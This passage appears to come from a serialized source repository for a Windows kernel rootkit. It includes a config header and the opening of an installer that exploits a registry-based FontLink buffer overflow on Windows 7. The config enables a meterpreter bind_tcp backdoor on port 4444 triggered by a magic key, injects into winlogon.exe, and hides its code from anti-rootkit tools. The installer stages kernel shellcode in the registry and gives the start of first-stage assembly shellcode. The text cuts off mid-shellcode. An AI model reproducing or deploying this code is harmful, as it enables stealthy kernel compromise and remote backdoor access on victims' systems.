AllocationSize;\r\n    ULONG FileAttributes;\r\n    ULONG FileNameLength;\r\n    ULONG EaSize;\r\n    CCHAR ShortNameLength;\r\n    WCHAR ShortName[12];\r\n    LARGE_INTEGER FileId;\r\n    WCHAR FileName[1];\r\n\r\n} FILE_ID_BOTH_DIRECTORY_INFORMATION, \r\n*PFILE_ID_BOTH_DIRECTORY_INFORMATION;\r\n\r\ntypedef struct _FILE_ID_FULL_DIRECTORY_INFORMATION \r\n{\r\n    ULONG NextEntryOffset;\r\n    ULONG FileIndex;\r\n    LARGE_INTEGER CreationTime;\r\n    LARGE_INTEGER LastAccessTime;\r\n    LARGE_INTEGER LastWriteTime;\r\n    LARGE_INTEGER ChangeTime;\r\n    LARGE_INTEGER EndOfFile;\r\n    LARGE_INTEGER AllocationSize;\r\n    ULONG FileAttributes;\r\n    ULONG FileNameLength;\r\n    ULONG EaSize;\r\n    LARGE_INTEGER FileId;\r\n    WCHAR FileName[1];\r\n\r\n} FILE_ID_FULL_DIRECTORY_INFORMATION, \r\n*PFILE_ID_FULL_DIRECTORY_INFORMATION; \r\n\r\ntypedef struct _SYSTEM_OBJECT_TYPE_INFORMATION \r\n{\r\n    ULONG NextEntryOffset;\r\n    ULONG ObjectCount;\r\n    ULONG HandleCount;\r\n    ULONG TypeNumber;\r\n    ULONG InvalidAttributes;\r\n    GENERIC_MAPPING GenericMapping;\r\n    ACCESS_MASK ValidAccessMask;\r\n    POOL_TYPE PoolType;\r\n    UCHAR Unknown;\r\n    UNICODE_STRING Name;\r\n\r\n} SYSTEM_OBJECT_TYPE_INFORMATION, \r\n*PSYSTEM_OBJECT_TYPE_INFORMATION; \r\n\r\ntypedef struct _SYSTEM_OBJECT_INFORMATION \r\n{\r\n    ULONG NextEntryOffset;\r\n    PVOID Object;\r\n    ULONG CreatorProcessId;\r\n    USHORT Unknown;\r\n    USHORT Flags;\r\n    ULONG PointerCount;\r\n    ULONG HandleCount;\r\n    ULONG PagedPoolUsage;\r\n    ULONG NonPagedPoolUsage;\r\n    ULONG ExclusiveProcessId;\r\n    PSECURITY_DESCRIPTOR SecurityDescriptor;\r\n    UNICODE_STRING Name;\r\n\r\n} SYSTEM_OBJECT_INFORMATION, \r\n*PSYSTEM_OBJECT_INFORMATION;\r\n\r\nNTSYSAPI \r\nNTSTATUS \r\nNTAPI \r\nZwQueryDirectoryFile(\r\n    HANDLE FileHandle, \r\n    HANDLE Event, \r\n    PIO_APC_ROUTINE ApcRoutine, \r\n    PVOID ApcContext,\r\n    PIO_STATUS_BLOCK IoStatusBlock, \r\n    PVOID FileInformation, \r\n  
  ULONG FileInformationLength, \r\n    FILE_INFORMATION_CLASS FileInformationClass,\r\n    BOOLEAN ReturnSingleEntry, \r\n    PUNICODE_STRING FileName, \r\n    BOOLEAN RestartScan\r\n);\r\n\r\ntypedef struct _SYSTEM_PROCESS_INFORMATION \r\n{\r\n    ULONG NextEntryOffset;\r\n    ULONG NumberOfThreads;\r\n    LARGE_INTEGER SpareLi1;\r\n    LARGE_INTEGER SpareLi2;\r\n    LARGE_INTEGER SpareLi3;\r\n    LARGE_INTEGER CreateTime;\r\n    LARGE_INTEGER UserTime;\r\n    LARGE_INTEGER KernelTime;\r\n    UNICODE_STRING ImageName;\r\n    KPRIORITY BasePriority;\r\n    HANDLE UniqueProcessId;\r\n    HANDLE InheritedFromUniqueProcessId;\r\n    ULONG HandleCount;\r\n    ULONG SessionId;\r\n    ULONG_PTR PageDirectoryBase;\r\n    SIZE_T PeakVirtualSize;\r\n    SIZE_T VirtualSize;\r\n    ULONG PageFaultCount;\r\n    SIZE_T PeakWorkingSetSize;\r\n    SIZE_T WorkingSetSize;\r\n    SIZE_T QuotaPeakPagedPoolUsage;\r\n    SIZE_T QuotaPagedPoolUsage;\r\n    SIZE_T QuotaPeakNonPagedPoolUsage;\r\n    SIZE_T QuotaNonPagedPoolUsage;\r\n    SIZE_T PagefileUsage;\r\n    SIZE_T PeakPagefileUsage;\r\n    SIZE_T PrivatePageCount;\r\n    LARGE_INTEGER ReadOperationCount;\r\n    LARGE_INTEGER WriteOperationCount;\r\n    LARGE_INTEGER OtherOperationCount;\r\n    LARGE_INTEGER ReadTransferCount;\r\n    LARGE_INTEGER WriteTransferCount;\r\n    LARGE_INTEGER OtherTransferCount;\r\n\r\n} SYSTEM_PROCESS_INFORMATION, \r\n*PSYSTEM_PROCESS_INFORMATION;\r\n\r\n\r\ntypedef struct THREAD_BASIC_INFORMATION\r\n{\r\n    NTSTATUS ExitStatus;\r\n    PVOID TebBaseAddress;\r\n    CLIENT_ID ClientId;\r\n    KAFFINITY AffinityMask;\r\n    KPRIORITY Priority;\r\n    KPRIORITY BasePriority;\r\n\r\n} THREAD_BASIC_INFORMATION,\r\n*PTHREAD_BASIC_INFORMATION;\r\n\r\ntypedef enum\r\n{\r\n    StateInitialized,\r\n    StateReady,\r\n    StateRunning,\r\n    StateStandby,\r\n    StateTerminated,\r\n    StateWait,\r\n    StateTransition,\r\n    StateUnknown\r\n\r\n} THREAD_STATE;\r\n\r\ntypedef struct _SYSTEM_THREAD \r\n{\r\n    
LARGE_INTEGER KernelTime;\r\n    LARGE_INTEGER UserTime;\r\n    LARGE_INTEGER CreateTime;\r\n    ULONG WaitTime;\r\n    PVOID StartAddress;\r\n    CLIENT_ID ClientId;\r\n    KPRIORITY Priority;\r\n    KPRIORITY BasePriority;\r\n    ULONG ContextSwitchCount;\r\n    THREAD_STATE State;\r\n    KWAIT_REASON WaitReason;\r\n\r\n} SYSTEM_THREAD, \r\n*PSYSTEM_THREAD;\r\n\r\ntypedef struct _SYSTEM_PROCESSES_INFORMATION\r\n{\r\n    ULONG NextEntryDelta;\r\n    ULONG ThreadCount;\r\n    ULONG Reserved1[6];\r\n    LARGE_INTEGER CreateTime;\r\n    LARGE_INTEGER UserTime;\r\n    LARGE_INTEGER KernelTime;\r\n    UNICODE_STRING ProcessName; \r\n    KPRIORITY BasePriority;\r\n    ULONG ProcessId;\r\n    ULONG InheritedFromProcessId;\r\n    ULONG HandleCount;\r\n    ULONG Reserved2[2];\r\n    VM_COUNTERS VmCounters;\r\n    IO_COUNTERS IoCounters;\r\n    SYSTEM_THREAD Threads[1];\r\n\r\n} SYSTEM_PROCESSES_INFORMATION, \r\n*PSYSTEM_PROCESSES_INFORMATION;\r\n\r\nNTSYSAPI \r\nNTSTATUS \r\nNTAPI \r\nZwQuerySystemInformation(\r\n    SYSTEM_INFORMATION_CLASS SystemInformationClass,\r\n    PVOID SystemInformation,\r\n    ULONG SystemInformationLength,\r\n    PULONG ReturnLength\r\n);\r\n\r\nNTSYSAPI\r\nNTSTATUS\r\nNTAPI\r\nZwQueryInformationProcess(\r\n    HANDLE ProcessHandle,\r\n    PROCESSINFOCLASS ProcessInformationClass,\r\n    PVOID ProcessInformation,\r\n    ULONG ProcessInformationLength,\r\n    PULONG ReturnLength\r\n);\r\n\r\nNTSYSAPI\r\nNTSTATUS\r\nNTAPI\r\nZwAllocateVirtualMemory(\r\n    HANDLE ProcessHandle,\r\n    PVOID *BaseAddress,\r\n    ULONG ZeroBits,\r\n    PULONG AllocationSize,\r\n    ULONG AllocationType,\r\n    ULONG Protect\r\n);\r\n\r\nNTSYSAPI\r\nNTSTATUS\r\nNTAPI\r\nZwFreeVirtualMemory(\r\n    HANDLE ProcessHandle,\r\n    PVOID *BaseAddress,\r\n    PULONG FreeSize,\r\n    ULONG FreeType\r\n);\r\n\r\nNTSYSAPI \r\nNTSTATUS \r\nNTAPI \r\nZwOpenThread(\r\n    PHANDLE ThreadHandle,\r\n    ACCESS_MASK DesiredAccess,\r\n    POBJECT_ATTRIBUTES ObjectAttributes,\r\n    
PCLIENT_ID ClientId\r\n);\r\n\r\nNTSYSAPI \r\nNTSTATUS \r\nNTAPI \r\nZwDeviceIoControlFile(\r\n    HANDLE  FileHandle,\r\n    HANDLE  Event,\r\n    PIO_APC_ROUTINE  ApcRoutine,\r\n    PVOID  ApcContext,\r\n    PIO_STATUS_BLOCK  IoStatusBlock,\r\n    ULONG  IoControlCode,\r\n    PVOID  InputBuffer,\r\n    ULONG  InputBufferLength,\r\n    PVOID  OutputBuffer,\r\n    ULONG  OutputBufferLength\r\n); \r\n\r\nNTSYSAPI \r\nNTSTATUS \r\nNTAPI\r\nZwFsControlFile(\r\n    HANDLE  FileHandle,\r\n    HANDLE  Event OPTIONAL,\r\n    PIO_APC_ROUTINE  ApcRoutine OPTIONAL,\r\n    PVOID  ApcContext OPTIONAL,\r\n    PIO_STATUS_BLOCK  IoStatusBlock,\r\n    ULONG  FsControlCode,\r\n    PVOID  InputBuffer OPTIONAL,\r\n    ULONG  InputBufferLength,\r\n    PVOID  OutputBuffer OPTIONAL,\r\n    ULONG  OutputBufferLength\r\n);\r\n\r\nNTSYSAPI \r\nNTSTATUS\r\nNTAPI\r\nZwSaveKey(\r\n    HANDLE  KeyHandle,\r\n    HANDLE  FileHandle\r\n); \r\n\r\nNTSYSAPI \r\nNTSTATUS\r\nNTAPI\r\nZwQueryVolumeInformationFile(\r\n    HANDLE FileHandle,\r\n    PIO_STATUS_BLOCK IoStatusBlock,\r\n    PVOID FsInformation,\r\n    ULONG Length,\r\n    FS_INFORMATION_CLASS FsInformationClass\r\n); \r\n\r\nNTSYSAPI \r\nNTSTATUS\r\nNTAPI\r\nZwQuerySecurityObject(\r\n    HANDLE  Handle,\r\n    SECURITY_INFORMATION  SecurityInformation,\r\n    PSECURITY_DESCRIPTOR  SecurityDescriptor,\r\n    ULONG  Length,\r\n    PULONG  LengthNeeded\r\n);\r\n\r\nNTSYSAPI \r\nNTSTATUS\r\nNTAPI\r\nZwSetSecurityObject(\r\n    HANDLE  Handle,\r\n    SECURITY_INFORMATION  SecurityInformation,\r\n    PSECURITY_DESCRIPTOR  SecurityDescriptor\r\n); \r\n\r\n\r\nNTSYSAPI \r\nNTSTATUS\r\nNTAPI\r\nZwDuplicateObject(\r\n    HANDLE SourceProcessHandle,\r\n    HANDLE SourceHandle,\r\n    HANDLE TargetProcessHandle,\r\n    PHANDLE TargetHandle,\r\n    ACCESS_MASK DesiredAccess,\r\n    ULONG HandleAttributes,\r\n    ULONG Options\r\n);\r\n\r\nNTSYSAPI \r\nNTSTATUS\r\nNTAPI\r\nZwCreateEvent(\r\n    PHANDLE EventHandle,\r\n    ACCESS_MASK DesiredAccess,\r\n   
 POBJECT_ATTRIBUTES ObjectAttributes,\r\n    EVENT_TYPE EventType,\r\n    BOOLEAN InitialState\r\n);\r\n\r\nNTSYSAPI \r\nNTSTATUS\r\nNTAPI\r\nZwWaitForSingleObject(\r\n    HANDLE Handle,\r\n    BOOLEAN Alertable,\r\n    PLARGE_INTEGER Timeout\r\n);\r\n\r\nNTSYSAPI \r\nNTSTATUS\r\nNTAPI\r\nRtlGetDaclSecurityDescriptor(\r\n    PSECURITY_DESCRIPTOR  SecurityDescriptor,\r\n    PBOOLEAN  DaclPresent,\r\n    PACL  *Dacl,\r\n    PBOOLEAN  DaclDefaulted\r\n);\r\n\r\n#ifndef __wtypes_h__\r\n\r\ntypedef struct _SID_IDENTIFIER_AUTHORITY\r\n{\r\n    UCHAR Value[ 6 ];\r\n\r\n} SID_IDENTIFIER_AUTHORITY;\r\n\r\ntypedef struct _SID_IDENTIFIER_AUTHORITY *PSID_IDENTIFIER_AUTHORITY;\r\n\r\n#endif\r\n\r\nNTSYSAPI \r\nNTSTATUS\r\nNTAPI\r\nRtlInitializeSid(\r\n    PSID  Sid,\r\n    PSID_IDENTIFIER_AUTHORITY  IdentifierAuthority,\r\n    UCHAR  SubAuthorityCount\r\n); \r\n\r\nNTSYSAPI \r\nULONG\r\nNTAPI\r\nRtlLengthSid(\r\n    PSID  Sid\r\n); \r\n\r\nNTSYSAPI \r\nNTSTATUS\r\nNTAPI\r\nRtlAddAccessAllowedAce(\r\n    PACL  Acl,\r\n    ULONG  AceRevision,\r\n    ACCESS_MASK  AccessMask,\r\n    PSID  Sid\r\n);\r\n\r\nNTSYSAPI \r\nNTSTATUS\r\nNTAPI\r\nRtlSetDaclSecurityDescriptor(\r\n    OUT PSECURITY_DESCRIPTOR  SecurityDescriptor,\r\n    BOOLEAN  DaclPresent,\r\n    PACL  Dacl,\r\n    BOOLEAN  DaclDefaulted\r\n);\r\n\r\nNTSYSAPI \r\nNTSTATUS\r\nNTAPI\r\nRtlSelfRelativeToAbsoluteSD2(\r\n    PSECURITY_DESCRIPTOR pSelfRelativeSecurityDescriptor,\r\n    PULONG pBufferSize\r\n); \r\n\r\nNTSYSAPI \r\nBOOLEAN\r\nNTAPI\r\nRtlValidSid(\r\n    PSID Sid\r\n); \r\n\r\ntypedef struct _KAPC_STATE \r\n{\r\n    LIST_ENTRY ApcListHead[2];\r\n    PVOID Process;\r\n    BOOLEAN KernelApcInProgress;\r\n    BOOLEAN KernelApcPending;\r\n    BOOLEAN UserApcPending;\r\n\r\n} KAPC_STATE, \r\n*PKAPC_STATE;\r\n\r\nNTSYSAPI\r\nVOID\r\nNTAPI \r\nKeStackAttachProcess(\r\n    PEPROCESS Process,\r\n    PKAPC_STATE ApcState\r\n);\r\n\r\nNTSYSAPI\r\nVOID\r\nNTAPI\r\nKeUnstackDetachProcess(\r\n    PKAPC_STATE 
ApcState\r\n);\r\n\r\nNTSYSAPI\r\nNTSTATUS\r\nNTAPI\r\nPsLookupProcessByProcessId(\r\n    HANDLE ProcessId,\r\n    PEPROCESS *Process\r\n);\r\n\r\nNTSYSAPI\r\nNTSTATUS\r\nNTAPI\r\nPsLookupThreadByThreadId(\r\n  HANDLE ThreadId,\r\n  PETHREAD *Thread\r\n);\r\n\r\n\r\nNTSYSAPI\r\nNTSTATUS\r\nNTAPI\r\nObOpenObjectByPointer(\r\n    PVOID Object,\r\n    ULONG HandleAttributes,\r\n    PACCESS_STATE PassedAccessState,\r\n    ACCESS_MASK DesiredAccess,\r\n    POBJECT_TYPE ObjectType,\r\n    KPROCESSOR_MODE AccessMode,\r\n    PHANDLE Handle\r\n);\r\n\r\nNTSYSAPI\r\nNTSTATUS\r\nNTAPI\r\nObOpenObjectByName(\r\n    POBJECT_ATTRIBUTES ObjectAttributes,\r\n    POBJECT_TYPE ObjectType, \r\n    KPROCESSOR_MODE AccessMode,\r\n    PACCESS_STATE AccessState, \r\n    ACCESS_MASK DesiredAccess,\r\n    PVOID ParseContext, \r\n    PHANDLE Handle\r\n);\r\n\r\nNTSYSAPI\r\nNTSTATUS\r\nNTAPI\r\nObReferenceObjectByName(\r\n    PUNICODE_STRING ObjectPath,\r\n    ULONG Attributes,\r\n    PACCESS_STATE PassedAccessState,\r\n    ACCESS_MASK DesiredAccess,\r\n    POBJECT_TYPE ObjectType,\r\n    KPROCESSOR_MODE AccessMode,\r\n    PVOID ParseContext,\r\n    PVOID *ObjectPtr\r\n);\r\n\r\nNTKERNELAPI \r\nNTSTATUS \r\nObQueryNameString(\r\n    PVOID Object,\r\n    POBJECT_NAME_INFORMATION ObjectNameInfo,\r\n    ULONG Length,\r\n    PULONG ReturnLength\r\n);\r\n\r\nNTKERNELAPI\r\nVOID\r\nKeSetSystemAffinityThread(\r\n    KAFFINITY Affinity\r\n);\r\n\r\ntypedef enum\r\n{\r\n    OriginalApcEnvironment,\r\n    AttachedApcEnvironment,\r\n    CurrentApcEnvironment\r\n\r\n} KAPC_ENVIRONMENT;\r\n\r\nNTKERNELAPI\r\nVOID\r\nKeInitializeApc(\r\n    PRKAPC Apc,\r\n    PRKTHREAD Thread,\r\n    KAPC_ENVIRONMENT Environment,\r\n    PKKERNEL_ROUTINE KernelRoutine,\r\n    PKRUNDOWN_ROUTINE RundownRoutine,\r\n    PKNORMAL_ROUTINE NormalRoutine,\r\n    KPROCESSOR_MODE ApcMode,\r\n    PVOID NormalContext\r\n);\r\n\r\nNTKERNELAPI\r\nBOOLEAN\r\nKeInsertQueueApc(\r\n    PKAPC Apc,\r\n    PVOID SystemArgument1,\r\n    PVOID 
SystemArgument2,\r\n    KPRIORITY Increment\r\n);\r\n"
  },
  {
    "path": "src/rootkit_driver_config.h",
    "content": "\r\n\r\n/**\r\n * Hide rootkit executable memory in discardable sections to avoid \r\n * 'hiiden code' detection from different anti-rootkits.\r\n */\r\n#define USE_STEALTH_IMAGE\r\n\r\n/**\r\n * Magic sequence that activates meterpreter/bind_tcp backdoor on 4444 port.\r\n * Use rootkit_ping.py script for communicating with the infected target.\r\n */\r\n#define ROOTKIT_CTL_KEY \"7C5E3380\"\r\n\r\n/**\r\n * Process to inject meterpreter DLL.\r\n */\r\n#define METERPRETER_PROCESS L\"winlogon.exe\"\r\n"
  },
  {
    "path": "src/rootkit_installer/rootkit_installer.cpp",
    "content": "#include \"stdafx.h\"\r\n\r\n#define EMIT(_data_) __asm __emit _data_\r\n#define _ __asm __emit\r\n\r\n#define ENDM 'DNE~'\r\n\r\n#ifdef USE_DEBUG_DRIVER\r\n#include \"../includes/rootkit_driver_debug.sys.h\"\r\n#else\r\n#include \"../includes/rootkit_driver.sys.h\"\r\n#endif\r\n\r\n// buffer lengt and return address offset\r\n#define BOF_MIN_LENGTH (0x05 * sizeof(PVOID))\r\n#define BOF_RET_OFFSET (BOF_MIN_LENGTH - sizeof(PVOID))\r\n\r\n// registry key and value name for malformed exploit data + 1-st shellcode\r\n#define EXPL_KEY \"Software\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\FontLink\"\r\n#define EXPL_VAL \"FontLinkDefaultChar\"\r\n\r\n#define SC2_KEY \"System\\\\CurrentControlSet\\\\Control\"\r\n#define SC2_VAL \"Configuration Data\"\r\n\r\n/** \r\n * Name of registry value in System\\CurrentControlSet\\Control, to store\r\n * rootkit driver image.\r\n */\r\n#define DRV_VAL \"PCI\"\r\n\r\n// Define the page size for the Intel 386 as 4096 (0x1000).\r\n#define PAGE_SIZE 0x1000\r\n\r\n/**\r\n * OS sensitive addresses and offsets.\r\n */ \r\n\r\n// magic address of JMP ESP for Windows 7 SP0-SP1\r\n#define JMP_ESP_ADDR 0xffdf04c7\r\n\r\n// offset of _KPCR::KdVersionBlock\r\n#define KPCR_KdVersionBlock 0x34\r\n#define KPCR_SelfPcr 0x1c\r\n#define PROCESSINFO_Flags 0x08\r\n\r\n#define WIN32_PROCESS_FLAGS 0x20040010\r\n\r\n/**\r\n * Virtual address inside of %SystemRoot%\\Config\\SYSTEM registry\r\n * hive, that mapped into the kernel memory.\r\n */\r\n#define REG_HIVE_ADDRESS 0x8d100000\r\n\r\n#define REG_SIGN_1 '\\x40\\x50\\x41\\x51'\r\n#define REG_SIGN_FULL \"\\x40\\x50\\x41\\x51\\x90\"\r\n\r\nBOOL m_DebugBreaks = TRUE;\r\n//--------------------------------------------------------------------------------------\r\nBOOL LoadPrivileges(char *lpszName)\r\n{\r\n    HANDLE hToken = NULL;\r\n    LUID Val;\r\n    TOKEN_PRIVILEGES tp;\r\n    BOOL bRet = FALSE;\r\n\r\n    if (!OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | 
TOKEN_QUERY, &hToken)) \r\n    {\r\n        DbgMsg(__FILE__, __LINE__, \"OpenProcessToken() fails: error %d\\n\", GetLastError());\r\n        goto end;\r\n    }\r\n\r\n    if (!LookupPrivilegeValueA(NULL, lpszName, &Val))\r\n    {\r\n        DbgMsg(__FILE__, __LINE__, \"LookupPrivilegeValue() fails: error %d\\n\", GetLastError());\r\n        goto end;\r\n    }\r\n\r\n    tp.PrivilegeCount = 1;\r\n    tp.Privileges[0].Luid = Val;\r\n    tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;\r\n\r\n    if (!AdjustTokenPrivileges(hToken, FALSE, &tp, sizeof (tp), NULL, NULL))\r\n    {\r\n        DbgMsg(__FILE__, __LINE__, \"AdjustTokenPrivileges() fails: error %d\\n\", GetLastError());\r\n        goto end;\r\n    }\r\n\r\n    bRet = TRUE;\r\n\r\nend:\r\n    if (hToken)\r\n    {\r\n        CloseHandle(hToken);\r\n    }\r\n\r\n    return bRet;\r\n} \r\n//--------------------------------------------------------------------------------------\r\nPVOID GetSysInf(SYSTEM_INFORMATION_CLASS InfoClass)\r\n{\r\n    NTSTATUS ns = 0;\r\n    ULONG RetSize = 0, Size = 0x100;\r\n    PVOID Info = NULL;\r\n\r\n    GET_NATIVE(NtQuerySystemInformation);\r\n\r\n    while (true) \r\n    {    \r\n        // allocate memory for system information\r\n        if ((Info = LocalAlloc(LMEM_FIXED | LMEM_ZEROINIT, Size)) == NULL) \r\n        {\r\n            DbgMsg(__FILE__, __LINE__, \"LocalAlloc() fails\\n\");\r\n            return NULL;\r\n        }\r\n\r\n        // query information\r\n        RetSize = 0;\r\n        ns = f_NtQuerySystemInformation(InfoClass, Info, Size, &RetSize);\r\n        if (ns == STATUS_INFO_LENGTH_MISMATCH)\r\n        {       \r\n            // buffer is too small\r\n            LocalFree(Info);\r\n            Info = NULL;\r\n\r\n            if (RetSize > 0)\r\n            {\r\n                // allocate more memory and try again\r\n                Size = RetSize + 0x100;\r\n            }            \r\n            else\r\n            {\r\n                break;\r\n         
   }\r\n        }\r\n        else\r\n        {\r\n            break;\r\n        }\r\n    }\r\n\r\n    if (!NT_SUCCESS(ns))\r\n    {\r\n        DbgMsg(__FILE__, __LINE__, \"NtQuerySystemInformation() fails; status: 0x%.8x\\n\", ns);\r\n\r\n        if (Info)\r\n        {\r\n            LocalFree(Info);\r\n        }\r\n\r\n        return NULL;\r\n    }\r\n\r\n    return Info;\r\n}\r\n//--------------------------------------------------------------------------------------\r\nPVOID KernelGetModuleBase(char *ModuleName, char *ModulePath, SIZE_T ModulePathLen)\r\n{\r\n    PVOID pModuleBase = NULL;\r\n    UNICODE_STRING usCommonHalName, usCommonNtName;\r\n\r\n    GET_NATIVE(RtlInitUnicodeString);\r\n    GET_NATIVE(RtlAnsiStringToUnicodeString);\r\n    GET_NATIVE(RtlInitAnsiString);\r\n    GET_NATIVE(RtlEqualUnicodeString);\r\n    GET_NATIVE(RtlFreeUnicodeString);\r\n\r\n    f_RtlInitUnicodeString(&usCommonHalName, L\"hal.dll\");\r\n    f_RtlInitUnicodeString(&usCommonNtName, L\"ntoskrnl.exe\");\r\n\r\n    #define HAL_NAMES_NUM 6\r\n    wchar_t *wcHalNames[] = \r\n    {\r\n        L\"hal.dll\",      // Non-ACPI PIC HAL \r\n        L\"halacpi.dll\",  // ACPI PIC HAL\r\n        L\"halapic.dll\",  // Non-ACPI APIC UP HAL\r\n        L\"halmps.dll\",   // Non-ACPI APIC MP HAL\r\n        L\"halaacpi.dll\", // ACPI APIC UP HAL\r\n        L\"halmacpi.dll\"  // ACPI APIC MP HAL\r\n    };\r\n\r\n    #define NT_NAMES_NUM 4\r\n    wchar_t *wcNtNames[] = \r\n    {\r\n        L\"ntoskrnl.exe\", // UP\r\n        L\"ntkrnlpa.exe\", // UP PAE\r\n        L\"ntkrnlmp.exe\", // MP\r\n        L\"ntkrpamp.exe\"  // MP PAE\r\n    };\r\n\r\n    PRTL_PROCESS_MODULES Info = (PRTL_PROCESS_MODULES)GetSysInf(SystemModuleInformation);\r\n    if (Info)\r\n    {\r\n        ANSI_STRING asModuleName;\r\n        UNICODE_STRING usModuleName;\r\n\r\n        f_RtlInitAnsiString(&asModuleName, ModuleName);\r\n\r\n        NTSTATUS ns = f_RtlAnsiStringToUnicodeString(&usModuleName, &asModuleName, TRUE);\r\n        
if (NT_SUCCESS(ns))\r\n        {\r\n            for (ULONG i = 0; i < Info->NumberOfModules; i++)\r\n            {\r\n                ANSI_STRING asEnumModuleName;\r\n                UNICODE_STRING usEnumModuleName;\r\n\r\n                f_RtlInitAnsiString(\r\n                    &asEnumModuleName, \r\n                    (char *)Info->Modules[i].FullPathName + Info->Modules[i].OffsetToFileName\r\n                );\r\n\r\n                NTSTATUS ns = f_RtlAnsiStringToUnicodeString(&usEnumModuleName, &asEnumModuleName, TRUE);\r\n                if (NT_SUCCESS(ns))\r\n                {                    \r\n                    if (f_RtlEqualUnicodeString(&usModuleName, &usCommonHalName, TRUE))\r\n                    {\r\n                        // hal.dll passed as module name\r\n                        for (int i_m = 0; i_m < HAL_NAMES_NUM; i_m++)\r\n                        {\r\n                            UNICODE_STRING usHalName;\r\n                            f_RtlInitUnicodeString(&usHalName, wcHalNames[i_m]);\r\n\r\n                            // compare module name from list with known HAL module name\r\n                            if (f_RtlEqualUnicodeString(&usEnumModuleName, &usHalName, TRUE))\r\n                            {\r\n                                lstrcpyn(ModulePath, asEnumModuleName.Buffer, (int)ModulePathLen);\r\n                                pModuleBase = (PVOID)Info->Modules[i].ImageBase;\r\n                                break;\r\n                            }\r\n                        }\r\n                    }\r\n                    else if (f_RtlEqualUnicodeString(&usModuleName, &usCommonNtName, TRUE))\r\n                    {\r\n                        // ntoskrnl.exe passed as module name\r\n                        for (int i_m = 0; i_m < NT_NAMES_NUM; i_m++)\r\n                        {\r\n                            UNICODE_STRING usNtName;\r\n                            f_RtlInitUnicodeString(&usNtName, 
wcNtNames[i_m]);\r\n\r\n                            // compare module name from list with known kernel module name\r\n                            if (f_RtlEqualUnicodeString(&usEnumModuleName, &usNtName, TRUE))\r\n                            {\r\n                                lstrcpyn(ModulePath, asEnumModuleName.Buffer, (int)ModulePathLen);\r\n                                pModuleBase = (PVOID)Info->Modules[i].ImageBase;\r\n                                break;\r\n                            }\r\n                        }\r\n                    }\r\n                    else if (f_RtlEqualUnicodeString(&usModuleName, &usEnumModuleName, TRUE))\r\n                    {\r\n                        lstrcpyn(ModulePath, asEnumModuleName.Buffer, (int)ModulePathLen);\r\n                        pModuleBase = (PVOID)Info->Modules[i].ImageBase;\r\n                    }\r\n\r\n                    f_RtlFreeUnicodeString(&usEnumModuleName);\r\n\r\n                    if (pModuleBase)\r\n                    {\r\n                        // module is found\r\n                        break;\r\n                    }\r\n                }                    \r\n            }                     \r\n\r\n            f_RtlFreeUnicodeString(&usModuleName);\r\n        }        \r\n\r\n        LocalFree(Info);\r\n    }\r\n\r\n    return pModuleBase;\r\n}\r\n//--------------------------------------------------------------------------------------\r\n#define GetKernelProcAddr(_proc_) GetKernelProcAddrEx(\"ntoskrnl.exe\", (_proc_), FALSE)\r\n#define GetHalProcAddr(_proc_) GetKernelProcAddrEx(\"hal.dll\", (_proc_), FALSE)\r\n#define GetKernelProcOffset(_proc_) GetKernelProcAddrEx(\"ntoskrnl.exe\", (_proc_), TRUE)\r\n#define GetHalProcOffset(_proc_) GetKernelProcAddrEx(\"hal.dll\", (_proc_), TRUE)\r\n\r\nPVOID GetKernelProcAddrEx(char *lpszModuleName, char *lpszProcName, BOOL bOffset)\r\n{\r\n    PVOID Addr = NULL;\r\n    \r\n    // get kernel module address and file path\r\n    char 
szModulePath[MAX_PATH];\r\n    PVOID ModuleBase = KernelGetModuleBase(lpszModuleName, szModulePath, MAX_PATH);\r\n    if (ModuleBase)\r\n    {\r\n        // load kernel image as dynamic library\r\n        HMODULE hModule = LoadLibraryExA(szModulePath, 0, DONT_RESOLVE_DLL_REFERENCES);\r\n        if (hModule)\r\n        {\r\n            // get address of target function\r\n            Addr = GetProcAddress(hModule, lpszProcName);\r\n            if (Addr)\r\n            {                               \r\n                if (bOffset)\r\n                {\r\n                    // calculate only function offsset\r\n                    Addr = (PVOID)((PUCHAR)Addr - (PUCHAR)hModule);\r\n                }                \r\n                else\r\n                {\r\n                    // calculate REAL address of this function\r\n                    Addr = (PVOID)((PUCHAR)Addr - (PUCHAR)hModule + (PUCHAR)ModuleBase);\r\n                }\r\n            }\r\n            else\r\n            {\r\n                DbgMsg(__FILE__, __LINE__, \"GetProcAddress() ERROR %d\\n\", GetLastError());\r\n            }\r\n\r\n            FreeLibrary(hModule);\r\n        }\r\n        else\r\n        {\r\n            DbgMsg(__FILE__, __LINE__, \"LoadLibraryEx() ERROR %d\\n\", GetLastError());\r\n        }\r\n    }\r\n    else\r\n    {\r\n        DbgMsg(__FILE__, __LINE__, __FUNCTION__\"(): Unable to locate \\\"%s\\\" module\\n\", lpszModuleName);\r\n    }\r\n\r\n    return Addr;\r\n}\r\n//--------------------------------------------------------------------------------------\r\n#define marker_MmIsAddressValid 'Val0'\r\n\r\n__declspec(naked) void Shellcode_1(void)\r\n{\r\n    __asm \r\n    {\r\n        /**\r\n         * 1-st STAGE SHELLCODE BEGIN\r\n         *\r\n         * EBX allways points to the win32k!NtUserInitialize()\r\n         *\r\n         */\r\n\r\n#ifdef USE_SHELLCODE_DEBUGBREAK\r\n\r\n        int     3\r\n#endif\r\n\r\n        /** \r\n         * Find kernel adderss\r\n        
 */\r\n        mov     eax, fs:[KPCR_SelfPcr]\r\n        mov     edi, dword ptr [eax + KPCR_KdVersionBlock]        \r\n        xor     di, di\r\n\r\n_find_kernel:\r\n\r\n        cmp     word ptr [edi], IMAGE_DOS_SIGNATURE\r\n        je      _kernel_ok\r\n        sub     edi, PAGE_SIZE\r\n        jmp     short _find_kernel\r\n\r\n_kernel_ok:\r\n\r\n        // get address of nt!MmIsAddressvalid()\r\n        add     edi, marker_MmIsAddressValid\r\n\r\n        /** \r\n         * Find 2-nd shellcode, that has been stored in registry hive,\r\n         * in kernel memory.\r\n         */\r\n\r\n        mov     esi, REG_HIVE_ADDRESS\r\n\r\n_loop:\r\n        // check for valid address\r\n        push    esi\r\n        call    edi\r\n        test    al, al\r\n        jz      _no_match\r\n\r\n        /** \r\n         * Check signature by 8 bytes\r\n         */\r\n        cmp     dword ptr [esi], REG_SIGN_1\r\n        jne     _no_match\r\n\r\n        cmp     byte ptr [esi + 4], 0x90\r\n        jne     _no_match\r\n\r\n        // signature matched!\r\n        jmp     esi\r\n\r\n_no_match:\r\n\r\n        add     esi, 0x10\r\n        jmp     short 